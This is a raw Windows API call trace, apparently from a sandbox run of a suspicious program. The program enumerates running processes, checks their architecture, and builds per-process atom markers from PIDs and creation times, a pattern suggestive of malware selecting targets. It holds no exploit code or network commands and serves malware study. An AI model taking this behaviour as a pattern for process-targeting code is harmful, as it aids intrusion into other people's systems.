	[0073.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.367] CloseHandle (hObject=0x224) returned 1
	[0073.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x728a58, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0073.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0073.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.367] CloseHandle (hObject=0x224) returned 1
	[0073.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0073.367] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.367] CloseHandle (hObject=0x224) returned 1
	[0073.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0073.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.368] CloseHandle (hObject=0x224) returned 1
	[0073.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea40, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0073.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0073.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.368] CloseHandle (hObject=0x224) returned 1
	[0073.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0073.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.368] CloseHandle (hObject=0x224) returned 1
	[0073.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0073.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.368] CloseHandle (hObject=0x224) returned 1
	[0073.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0073.368] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.368] CloseHandle (hObject=0x224) returned 1
	[0073.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0073.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.369] CloseHandle (hObject=0x224) returned 1
	[0073.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0073.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0073.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.369] CloseHandle (hObject=0x224) returned 1
	[0073.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72eab8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0073.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0073.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.369] CloseHandle (hObject=0x224) returned 1
	[0073.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea40, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0073.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.369] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.369] CloseHandle (hObject=0x224) returned 1
	[0073.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772200, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0073.369] GetLastError () returned 0x5
	[0073.369] GetLastError () returned 0x5
	[0073.369] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetLastError () returned 0x5
	[0073.370] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.371] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0073.371] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.371] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.372] GetLastError () returned 0x5
	[0073.373] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.373] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0073.373] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0073.373] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0073.373] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0073.373] CloseHandle (hObject=0x224) returned 1
	[0073.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0073.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0073.373] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.373] CloseHandle (hObject=0x224) returned 1
	[0073.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e680, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0073.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0073.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0073.374] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.374] CloseHandle (hObject=0x224) returned 1
	[0073.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772200, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0073.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16e08) returned 0xc0000004
	[0073.417] VirtualAlloc (lpAddress=0x0, dwSize=0x16f08, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0073.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16f08, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0073.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0073.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x7721d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0073.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0073.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0073.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0073.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0073.419] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0073.420] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0073.421] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0073.421] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.421] CloseHandle (hObject=0x224) returned 1
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0073.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x728a98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0073.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0073.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.422] CloseHandle (hObject=0x224) returned 1
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0073.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0073.422] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0073.422] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.422] CloseHandle (hObject=0x224) returned 1
	[0073.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0073.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0073.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.423] CloseHandle (hObject=0x224) returned 1
	[0073.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0073.423] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0073.423] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0073.423] CloseHandle (hObject=0x224) returned 1
